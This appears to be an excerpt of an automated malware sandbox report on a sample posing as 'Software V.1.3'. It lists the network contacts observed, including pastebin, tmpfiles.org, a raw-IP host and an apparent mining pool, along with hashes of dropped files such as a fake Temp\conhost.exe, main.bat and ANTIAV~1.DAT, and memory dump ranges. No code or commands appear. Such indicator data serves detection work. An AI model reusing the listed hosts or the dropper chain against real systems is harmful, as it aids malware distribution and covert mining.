| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| NL | 94.228.166.68:80 | tcp | |
| US | 8.8.8.8:53 | 68.166.228.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 81.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| DE | 147.45.47.81:80 | 147.45.47.81 | tcp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
| GB | 88.221.135.42:443 | www.bing.com | tcp |
| GB | 88.221.135.42:443 | www.bing.com | tcp |
| GB | 88.221.135.42:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 42.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tmpfiles.org | udp |
| US | 172.67.195.247:80 | tmpfiles.org | tcp |
| US | 172.67.195.247:80 | tmpfiles.org | tcp |
| US | 172.67.195.247:443 | tmpfiles.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 88.221.134.137:80 | apps.identrust.com | tcp |
| US | 172.67.195.247:443 | tmpfiles.org | udp |
| US | 8.8.8.8:53 | 247.195.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 172.67.195.247:443 | tmpfiles.org | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 172.67.195.247:443 | tmpfiles.org | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:443 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 54f1b76300ce15e44e5cc1a3947f5ca9 |
| SHA1 | c978bfaa6ec6dae05464c6426eaa6cb3c3e2f3b7 |
| SHA256 | 43dec5d87b7ee892a3d99cb61f772ba403882ac0772423f36034e84244c1ca24 |
| SHA512 | ac26e5676c675be329eb62b5d5a36a0e6014ab8a6366684b0fc2a59ae5f061f596f462b82eb4e9f135d2235a0cbd4af96680d234eecc873a8397fd81507d277a |
\??\pipe\LOCAL\crashpad_5096_ZKZRYXCXYVEKOVJR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c00b0d6e0f836dfa596c6df9d3b2f8f2 |
| SHA1 | 69ad27d9b4502630728f98917f67307e9dd12a30 |
| SHA256 | 578481cd359c669455e24983b13723c25584f58925b47283cb580019ef3142b1 |
| SHA512 | 0e098ab5f5772fec17880e228a0dccbbaa06dc1af14e0fd827f361599c61899fe07d612a7f7b049ff6661d27fdc495566dd20fc28ceed022b87c212bf00be5da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6296902e99300eb897f8c72a364ce512 |
| SHA1 | 43cb6a9b72cb217e88fc52c87ee00e0679cfc109 |
| SHA256 | 929bd2bff0c4d8d0aa9296ffb0c92c84a59c6fcac58e4a5444fb175bf4983036 |
| SHA512 | b1e67735abeb75128825f26920c219039f3d88405bbc4661559e0220a694234290dce2cb92af85ba623ae20d4d6b83c83fb64b03d02eb671f9a6366fc235ebee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 388400c7d3aebefb513685f448d3f4e2 |
| SHA1 | bd849d6ff6ea7bb784e0f60a94f7dcb6c5c3797a |
| SHA256 | 1dc0017f9c73f8151a6902ac7f6bbe53f9c709417eb5b7e5ff2d46b8e5fb6bfa |
| SHA512 | 011453ff0714eacca45e7324a2eca56ae0a7c954d46ba3d19648a2f8be3153e7c8e9e7f60bf89bca5972ca89a5b4bc029bc486fc81bbfb57a0ba8061a91572f2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5c508694615b3f081c9a61d401dab843 |
| SHA1 | 8a6c432df460f90588597d2d1ec4521283fb6f13 |
| SHA256 | 8bdc34e2982bcbac8b4a89b0e05d0d95a8ff7cbbbf4236ca20dd33b82554eec9 |
| SHA512 | a151670b64ef1d9790bc45d1665a0881c960ee20a82b1cd09fe7c27f8982318aefe2bd566289ecbf7542c008331835be0bcb2efec92136d53085763da2837e3a |
C:\Users\Admin\Downloads\Unconfirmed 177400.crdownload
| MD5 | f1320bd826092e99fcec85cc96a29791 |
| SHA1 | c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed |
| SHA256 | ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba |
| SHA512 | c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | aed0e3a97bb579744c7c44306ca6f976 |
| SHA1 | 3ee31e98820be48a4159c80aec347b676fc08ecf |
| SHA256 | 89a4765d46b06a4560aea491dd11ad5b09750c8c132e5693e247d8caa59602a0 |
| SHA512 | e2c9d49f8ce0756440682eb508589cfbb02b7bdaf2a75fb834c5c89f5274345a3bc2650eb548f938f438d6919e1001738efd70b866d27b7ce4e3b30c96b08d22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 13e46e9816bf6c037029146285080882 |
| SHA1 | f58860c71723204651bffb21a7a4597a9f5cdb03 |
| SHA256 | 4ce2ec0e00475fd5e97973e5017a3a21e31f12f23330bb7ccb0d716bd3369897 |
| SHA512 | c59d702e8dbe31dbf85404680b80ebb5e1795898e0fc3b8158cc70e4e0e1557196dd033c1beab4b6fd6e729b0926b9ca4b01356ff83521560653c2fbb3d4c8f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4d532a24a3c52c0b931476ea796bfecf |
| SHA1 | 30fa3210bd1b7d0258b96056addcf678d68e75b3 |
| SHA256 | 11ae2bba5d10662a96e798550630066c36964123b729818b2dd2e1842534ceca |
| SHA512 | 80cf6645dad94abe07a65a63aebf6cf0a8b2dc664f02cca145109859f38c0b8e889db4e098d3953fbfcfb6c9c565c7d00e0aa86d15182a2b44c951fd30fb8762 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 261f13ea3a2d911c8a31dc43dd5968c6 |
| SHA1 | 635c5b81daa8beb2a74793a44b148f69958fd3bd |
| SHA256 | b500d7443de36b1a0603a5da4ea09bf12884b309f54fe0a0408c56cb5ead4448 |
| SHA512 | 02915024ffa61e7e7f55712e8903e762ea7adf2689867d5724fbb04556277252866140cf45e5a512e89ec4a18f44e4e0f988dce3f1b5e2a4a392ca2cdef13eb8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | bd6ad1e41587fef93b83b1cb2ff45356 |
| SHA1 | 774b417752e7287e2b69406126541d5e75145561 |
| SHA256 | 1dc7b2a82f7866582fa5ea332d5cce18ff2b266828c7f44ce5727185531d2d35 |
| SHA512 | d304887123a07d7f3c55554e8f7c800a0580d0919442f235d4e8c718c5fe16720eb6e9776449cef895fc0f3ea82491a713ed2464eab92d8274c9a7f262ebfdce |
C:\Program Files\7-Zip\7-zip.dll
| MD5 | 8af282b10fd825dc83d827c1d8d23b53 |
| SHA1 | 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355 |
| SHA256 | 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca |
| SHA512 | cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8 |
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 79e8ca28aef2f3b1f1484430702b24e1 |
| SHA1 | 76087153a547ce3f03f5b9de217c9b4b11d12f22 |
| SHA256 | 5bc65256b92316f7792e27b0111e208aa6c27628a79a1dec238a4ad1cc9530f7 |
| SHA512 | b8426b44260a3adcbeaa38c5647e09a891a952774ecd3e6a1b971aef0e4c00d0f2a2def9965ee75be6c6494c3b4e3a84ce28572e376d6c82db0b53ccbbdb1438 |
C:\Program Files\7-Zip\7z.dll
| MD5 | 0009bd5e13766d11a23289734b383cbe |
| SHA1 | 913784502be52ce33078d75b97a1c1396414cf44 |
| SHA256 | 3691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129 |
| SHA512 | d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b |
C:\Users\Admin\Desktop\Software V.1.3\Software V.1.3.exe
| MD5 | 4e2059a953b95f26601153f2deedbdce |
| SHA1 | f1f32b5ab314e4302da176e382013871e4bcb411 |
| SHA256 | 6990f5a84adf0a961b87dabeaad56305cf2642abdd511b57dfe9f89fe4d61dea |
| SHA512 | 431af94fcf3f74bd488ed0a1a84013b13d0441d6dba3a84579506736ccccd482d5edac76a4e5949146515ccaaf01721e19a6c3d4f2087c516788abcc0ab3de15 |
memory/2096-1683-0x0000000000400000-0x0000000000450000-memory.dmp
memory/2096-1684-0x0000000005840000-0x0000000005DE4000-memory.dmp
memory/2096-1685-0x0000000005330000-0x00000000053C2000-memory.dmp
memory/2096-1686-0x0000000005320000-0x000000000532A000-memory.dmp
memory/2096-1687-0x0000000006810000-0x0000000006E28000-memory.dmp
memory/2096-1688-0x00000000081A0000-0x00000000082AA000-memory.dmp
memory/2096-1689-0x0000000008090000-0x00000000080A2000-memory.dmp
memory/2096-1690-0x00000000080B0000-0x00000000080EC000-memory.dmp
memory/2096-1691-0x0000000008130000-0x000000000817C000-memory.dmp
memory/2096-1692-0x0000000009030000-0x0000000009096000-memory.dmp
memory/2096-1693-0x00000000094C0000-0x0000000009682000-memory.dmp
memory/2096-1694-0x0000000009BC0000-0x000000000A0EC000-memory.dmp
memory/2096-1696-0x0000000009420000-0x0000000009470000-memory.dmp
C:\Users\Admin\Desktop\Software V.1.3\license.txt
| MD5 | e3f2ad7733f3166fe770e4dc00af6c45 |
| SHA1 | 3d436ffdd69f7187b85e0cf8f075bd6154123623 |
| SHA256 | b27c1a7c92686e47f8740850ad24877a50be23fd3dbd44edee50ac1223135e38 |
| SHA512 | ed97318d7c5beb425cb70b3557a16729b316180492f6f2177b68f512ba029d5c762ad1085dd56fabe022b5008f33e9ba564d72f8381d05b2e7f0fa5ec1aecdf3 |
C:\Users\Admin\Desktop\Software V.1.3\Serial.txt
| MD5 | 3ff2c48477c6de9abeb32c501d83a1c4 |
| SHA1 | e4edeb640916455e390a924749f3551c4c38c1ff |
| SHA256 | 22d2e80d80c7373a62067dfb6d511611da1043b541c05de81d6d407a3d6568fc |
| SHA512 | 0feff4384d1e0da2787f0be6d2f1f213cf335d36039f7b148849c3d8ef5a907c8aadab7cfa8f213e54ffff174c8fec527f5d1ed073c9db652f84dd3e8ba2f8d7 |
C:\Users\Admin\AppData\Local\Temp\conhost.exe
| MD5 | b2e6a3d0bf3320b759c464ae6fa5b735 |
| SHA1 | cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1 |
| SHA256 | 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3 |
| SHA512 | bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a |
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 893874465a8d9f68f0684fd61e9f1d3c |
| SHA1 | 866a58255ebab05d4ee2f2ed8383a6555ac1df03 |
| SHA256 | e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0 |
| SHA512 | 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7 |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 716459a6ceac7d310d4227ea3e9ddb59 |
| SHA1 | fa27addf18c197bf5fc054bfb5ae57de1caf3382 |
| SHA256 | ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1 |
| SHA512 | 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1 |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | a62944686498212b290eae637729a151 |
| SHA1 | 2053660850d3f578f7b31e5ced16069d6f9c4ee0 |
| SHA256 | 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e |
| SHA512 | ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | 870a5535c79edcf782551514f48d89ab |
| SHA1 | 333d814d65753cdc4c4e8fb587c09af6960110d1 |
| SHA256 | 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d |
| SHA512 | f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 6f7f4f7ed739e3ac5eee8d0876ff76d4 |
| SHA1 | 9a65d52885624dc47f342b5a9875d7720540c755 |
| SHA256 | b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc |
| SHA512 | 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 4a5f569872c858ede1c0c67500cfdd6d |
| SHA1 | cdcac69d89b45a7903198467c2d2d32126c31661 |
| SHA256 | 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc |
| SHA512 | d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
| MD5 | a915fd2a4e2750ee9003e628294bf284 |
| SHA1 | f9adc1e65fc3d2cf39b2c5a89030f3225e21616d |
| SHA256 | 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285 |
| SHA512 | 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
| MD5 | 18f4fe969c4ba0517b403e28f7ad2b72 |
| SHA1 | 9df09751ee1246db2ed6b6ed6fec87fb0891e077 |
| SHA256 | 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4 |
| SHA512 | 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
| MD5 | 4265bf9f9535ebb4e1830e2a50589285 |
| SHA1 | ddc45fe277a3b39179dd9e39e17d71b50a184607 |
| SHA256 | c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403 |
| SHA512 | 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be |
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
| MD5 | 6dd7f70cddc4310e047032d70550f72c |
| SHA1 | e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562 |
| SHA256 | e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d |
| SHA512 | 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c |
memory/556-1767-0x0000000000CC0000-0x0000000000CCC000-memory.dmp
memory/3428-1768-0x00000000025A0000-0x00000000025D6000-memory.dmp
memory/3428-1769-0x0000000004C60000-0x0000000005288000-memory.dmp
memory/3428-1770-0x00000000052E0000-0x0000000005302000-memory.dmp
memory/3428-1771-0x0000000005380000-0x00000000053E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_erhhiaiy.jkr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3428-1777-0x0000000005520000-0x0000000005874000-memory.dmp
memory/3428-1782-0x0000000005B50000-0x0000000005B6E000-memory.dmp
memory/3428-1783-0x0000000005BE0000-0x0000000005C2C000-memory.dmp
memory/3428-1784-0x0000000006D00000-0x0000000006D32000-memory.dmp
memory/3428-1785-0x0000000070A10000-0x0000000070A5C000-memory.dmp
memory/3428-1795-0x0000000006D40000-0x0000000006D5E000-memory.dmp
memory/3428-1796-0x0000000006D60000-0x0000000006E03000-memory.dmp
memory/3428-1797-0x00000000074E0000-0x0000000007B5A000-memory.dmp
memory/3428-1798-0x0000000006E90000-0x0000000006EAA000-memory.dmp
memory/3428-1799-0x0000000006F00000-0x0000000006F0A000-memory.dmp
memory/3428-1800-0x0000000007120000-0x00000000071B6000-memory.dmp
memory/3428-1801-0x0000000007090000-0x00000000070A1000-memory.dmp
memory/3428-1802-0x00000000070D0000-0x00000000070DE000-memory.dmp
memory/3428-1806-0x00000000070E0000-0x00000000070F4000-memory.dmp
memory/3428-1807-0x00000000071C0000-0x00000000071DA000-memory.dmp
memory/3428-1808-0x0000000007110000-0x0000000007118000-memory.dmp
C:\Program Files\7-Zip\7zG.exe
| MD5 | ef0279a7884b9dd13a8a2b6e6f105419 |
| SHA1 | 755af3328261b37426bc495c6c64bba0c18870b2 |
| SHA256 | 0cee5cb3da5dc517d2283d0d5dae69e9be68f1d8d64eca65c81daef9b0b8c69b |
| SHA512 | 9376a91b8fb3f03d5a777461b1644049eccac4d77b44334d3fe292debed16b4d40601ebe9accb29b386f37eb3ccc2415b92e5cc1735bcce600618734112d6d0e |
C:\Users\Admin\Desktop\Software V.1.3\bin\AccessibleHandler.dll
| MD5 | e8688be89671c227bb7f28e268298dd5 |
| SHA1 | afc2b49472fa08d2308821be9ffa532a6175c17f |
| SHA256 | 7b55754848846948064e06184f670ca884e5fdb8edcec4b1d285e13546ee811d |
| SHA512 | 7f3b7ad877373002bcb70c749139027137afff829b3254edbabfc6704adac97031e5f6346e2945ab0e8f0c997b5cf0f6ce5a97fdbf6b603e69c27584c62eac59 |
C:\Users\Admin\Desktop\Software V.1.3\bin\Accessible.tlb
| MD5 | eb6b19485db3c42890928f397f23317a |
| SHA1 | 544e0e74868514082f1cf66ecce9f5f7d8a392dd |
| SHA256 | 66c84a0599b669b91c1f24d0c732447440e26e9e71df41fff31a4779aa8e7b1e |
| SHA512 | 5ca7cab42ab2da8fd3f389793eace9d2a3290e91ba79867fde3712261b6d84f4029d577ae501ede67b7b929b984bc9bf2ffcd3e599e9b9f32e3f611fc7b53281 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e6d055237cc5ac8b34e2616da0e1e391 |
| SHA1 | 0ab1fe501cfaf1266be8ba01c79bf33468b9dfae |
| SHA256 | 21de8724287101fa4f2d99127c971545025185122f35ff9ff6cc5bc11b885909 |
| SHA512 | 59b22aebe2d3979bc29a8ae34df813f9f12321a8cac855e6258e6b6965c53efbab75f2c6a531d5c3b844ddbffbafed7639d750592db716de7452ce05876e48d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9d19f1aa9a479ebf0da5edd17656308c |
| SHA1 | 8f573f406e231528b086f9597c6e8153e962f397 |
| SHA256 | d72cb2dc3b6775a41b0597312f07d632ffab8583009128dac8d51063b64902f2 |
| SHA512 | ef36774a3ebfdf66bbac1a31a6588fc6024aac7fc33bea4ee8eded07b5c63583fb399a8f1a9d6a96494efe1c59c6b5b790f347ae722c5a9c92477da1a689e430 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 567e96f74b6efcd794d686e2a69c0963 |
| SHA1 | 2207b2c27fb993ae7ae1942e7dd59de7fe2f5d94 |
| SHA256 | 18ed562a97a229d48d7db7dc128835beb2422c772471dae63befeb84f80c9a62 |
| SHA512 | b24beb7e8154e0b984ffb374e956f2c7ca2e5c2209bb1471d6a21f2cc95513cfb166bd4bf840a094301181cb51862a4d18e4e5179b5147588e3f6ed7bf2708d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 11ed482946fb5aa91023eb2a660a3866 |
| SHA1 | 30437851093f4e0410676cc71bd9c11fc7ac7b52 |
| SHA256 | 47c4fe8d2312b252c37d2e5449e6c44be52a6a5d7bac00245addfe6d06049959 |
| SHA512 | 2820e7457b44ed9471df9c2961ba585767efbb1dd4ebb69d5907930ca97f42204ec68bdbda5dc7288adea51a0529328764559001757bcd41ce34c6eb415bcc73 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fb2ac96ed06d4b03385dd41a4992ca89 |
| SHA1 | 0f06f67bfb77590c2055b4a6a14b6c2fd5b9eb2a |
| SHA256 | 6f539adacfaa329ed0027048cf975c220ce1f13fbd58fefa46e1cb9c5186caad |
| SHA512 | c1d5c297378537539cfba647649f09619fb60746f70dd22a17f3d3130b59790f3517d953a68a55e4c65641b0b860ea63d8c41996d3e01ef76b2f6e1acf556eb6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a78dea51d1f96efbd5128f42d3c47499 |
| SHA1 | 1c01dcf01d1e7603053613b40198e32decfef867 |
| SHA256 | 23ad790dfd8118ce224dcb49993c2ee421934ab1321333de1d485e5168da24f6 |
| SHA512 | 8c980c2ad33a5e53ebd3230d9558a0e820fda2904777f864c65de31007e064123361a437b9994753adb68a422910b0521cd88e7d172ba2168343fcf2435a828f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 88c78f9534b48bc7d4c2582ddd5997c8 |
| SHA1 | 4c1bb110326b0516ae5466f41f2429ba4143ba8f |
| SHA256 | c458a2a30b7926dec101c5d23553a5dbe281dbfb3ee81fb65ccbeaa19d36b722 |
| SHA512 | b732a80580474b435fe35a5d69351438a1e94d0c3f87772669c9440eef133fac222beacc6cdf2b1f6652c965e98c9126b1606354e7503518776ca9cb4f0cd03b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a7efc0ac6fa5e8d03a45ab646034248e |
| SHA1 | ca648f7870371ff2a74ed58a120a5afef9442a5e |
| SHA256 | a1b257c54a1f8e2e93cd4220e658ed9f357bd6adc35f42af5975104164408d7c |
| SHA512 | 04aa92c7a465ba74d765bc4b437518e4dcb3889decfc3872d1bb5d2a129b51ffd2f975f6917623399ff926b10db3382d5389d81ea7f3fcb7f2875e7fc5b3ff57 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b09708cb81d0e7803dd1c1f2b0956e50 |
| SHA1 | 9880129ea0c08ab589525df73584394314d89b67 |
| SHA256 | 61b4a4b7ea4e8f3e30d98ceea19fe2e302b5cf5d590434cdc263cebea107a5fa |
| SHA512 | c00809b5767ecbef883d53574e365875dcd7487dea83b87d3b7b4f68773deec97ae46a96d62d2c7fc5cd68618586f83432a5fd0757f7b176b98fb175f37be664 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 3e79b87a6f985df9b30e99ed2659f63c |
| SHA1 | c6fe4e61c7d21d72d85c384364bab27adfe7d532 |
| SHA256 | 812719b40fe7a11bd1e308a91bea5d4cccb284ea2415bf5b6c539cfef172d009 |
| SHA512 | e9cae071254b3d231a993bffa7a108184527a05100d3d5a01079c4aae981208b64888e6e90c743de4a112b2753cab9bf5a5a1a1fb65427510aef1ef4f6d69fb9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ae903c1d-f557-4f90-9ba7-681deafc6864.tmp
